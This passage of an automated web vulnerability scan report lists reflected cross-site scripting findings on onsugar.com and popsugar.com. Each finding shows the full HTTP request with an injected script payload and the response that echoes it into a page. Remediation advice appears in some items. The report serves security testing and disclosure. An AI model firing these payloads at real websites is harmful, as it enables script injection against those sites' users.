HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832642%7CPlX7exM%2F2VKT4xhnnXce4TwYjmyaLu5fXuolcj%2B39sgDSw9zzrwXiF6yXituIHWATQkjYJVp9AbgdMJ6szw875Gkx%2BuAvXudo7leHhX%2F8iJMk%2BxPhd39jzHp6Hem%2FCHJbPzTI1P6Np4wskedc4UjSxjRf6D6vWf5VxS4%2Fk66DYdDvmuNF9Y8D3NTG%2BCe1AZ9tj83XQw%2Fsdfm2z17mlTlnA%3D%3D%7C32acfef3993955b12c9f4ef4b50c4912e752e802; expires=Wed, 05-Oct-2011 16:37:22 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:02 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.125. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc9e"><script>alert(1)</script>b1683b2d7ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832644%7Cio2s1Ow5Ncf%2F%2Fl6lcs9xNKXmSCTELGwjgZ%2B30%2BsL%2BBCsKQ1Lv54pc%2FiTc5iX8SFFQIvOXkLhf5bYPeelsJvscy7uLqQZebvK0VYAgwAB42NGUQCNrwF76WrK6%2BnbwWxK92zuu7fijHl8EuYS7xUwWG%2BfIx9RaVwSB%2B3C2MU6z1Qttn6Ir8ABR0cuSKocRVI68BI1Gi56KXlH5tGAHh5KIg%3D%3D%7C97a9f8778b10895f16abe7ced926ed84d50e8017; expires=Wed, 05-Oct-2011 16:37:24 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.126. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4217b"-alert(1)-"1a7cc52b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832645%7CFOnqvD5UU3%2BUJgXtp2jPLd00CihayQtMbrH4XGUffzXA5zB7bhttXGMIFXU1fS1UgZz8Czaxf2aEQ7OOvGv3H5A7e2KdLho551ayNhJBe7uuasmqhM9z7eqWwr0PMT9wtID0JdyilKZu6XUoJjIKl25uXVopt2hpgs46jICOno6xXzuSlDiazg6tbKjGtziEZkG3nGgRR2hKvL7XAJWH%2BQ%3D%3D%7C670bb0a18cfd2ae29f1ecf51d7bd68f46414fc49; expires=Wed, 05-Oct-2011 16:37:25 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:05 GMT
Server: lighttpd/1.4.26
Content-Length: 8001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.127. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b281b"-alert(1)-"dce851da1d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832648%7CS1ct4OelR%2FlO6%2F4TyK3kytYnTtHD2WAkTX9w6edSBh%2BhWeYJBSuQq%2F4ZudckOlNHnYcd3Yg6YA8etZBDdntye8s%2ByoyXo1Cwwuim2ivs2IR7%2FvbA3aM29%2FBrTb3EkoCi7OP%2BqOkQFP%2Ff6%2FgXHOEkNdZlhi4HS0nAfVYjAZ3bbPKqJRJQ1wEUb3gWVsyNHOcas1yiVywhkZcrS2TMEugGrg%3D%3D%7Cb41abd34caa2ce189f969af07b306fc0a82ebb95; expires=Wed, 05-Oct-2011 16:37:28 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:08 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.128. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d58f"><script>alert(1)</script>358ef49d22c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832647%7CU%2B8KzzGTQDjsyinyxAa5%2FZ2X%2BbF7Ne1pn4rOi%2FO6TkYNHR6ZyOb2a6K1KzAvYfho%2BFqPSlApJzMA1LnLKd4g2hT8Al1%2B%2BUUTxEX3QLGVI%2FVo4nzECvqe9ys%2F7kmnuItNKTr69DNqakEOSfuj5I3HkR8hUMOJJ3H3qPT5bI3kLNvxaBSuOoktB28ILYCaywW%2BkhYj72OcbewWZYoyVv0xKA%3D%3D%7C3b2fc535e94955b0ae945f747c82a641a36ca1a6; expires=Wed, 05-Oct-2011 16:37:27 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:07 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.129. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a1"-alert(1)-"c8a5c0fff23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/505a1"-alert(1)-"c8a5c0fff23?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831676%7CFWuR3rvfbbY5%2FMDWsCLoTMrE%2FIO9JaMIyUtnAkEQfmXmsJKlgNvmVB6d8yuUQtJKZt5QbQCsVFCvk7vrABwb9YS16L90KsGRkmt2iu5RQUTt%2B2X8Wx2VM%2BktODGDYumTvLgAdDZozVeZgyEbFbs6xM%2FHtEXyK3xwhgU0h%2B%2B2aXLTxDKxn6Fir8ipbCbqRgr9fm0q1TjWwitCn36M9IPJMw%3D%3D%7Ca14adba45dd6721dd7e44ec9b081d759f64dc04a; expires=Wed, 05-Oct-2011 16:21:16 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "a5109bd915fbacdba358a709224af1dd";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/505a1"-alert(1)-"c8a5c0fff23",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.130. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c964"><script>alert(1)</script>fa900ede36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964"><script>alert(1)</script>fa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; expires=Wed, 05-Oct-2011 16:21:15 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:55 GMT
Server: lighttpd/1.4.26
Content-Length: 7787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964"><script>alert(1)</script>fa900ede36&c5=&c6=&c15=a5109bd915fbacdba358a709224af1dd&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.131. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbf1"><script>alert(1)</script>0838c82964a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216779
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831683%7CW7Cc04oKuS%2FFL%2FWDuqxqWUgvLzSfjJaKze7pGoBWOfj6s2o1LE3eGfCCVh6dEpmmV2AqDKGuc4L4PrYYB9Gomsr0m%2BEcEWErb1f5kWM5HmkwZULLF3xDsI5uyNEH2Jvs%2Fl1%2Ftysqnay5H1Ze7gRVfIw0FpM90oXY%2BbhvF1KEzc%2FVlrr1qTRDS3912fXNIHvpbXKpvqVvrtRkgTfFZKpywQ%3D%3D%7Ca957e63a43c4911b378534156090709ab5a6580f; expires=Wed, 05-Oct-2011 16:21:23 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A+%5B%7B%22sugar-menu-subnav-items%22%3A+%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C+%7B%22user-feedback-div%22%3A+%22%2Fsugar-user-feedba
...[SNIP]...

2.132. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1274b"-alert(1)-"faa5baba69b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajaxharness1274b"-alert(1)-"faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216634
Date: Mon, 12 Sep 2011 12:48:06 GMT
Connection: close
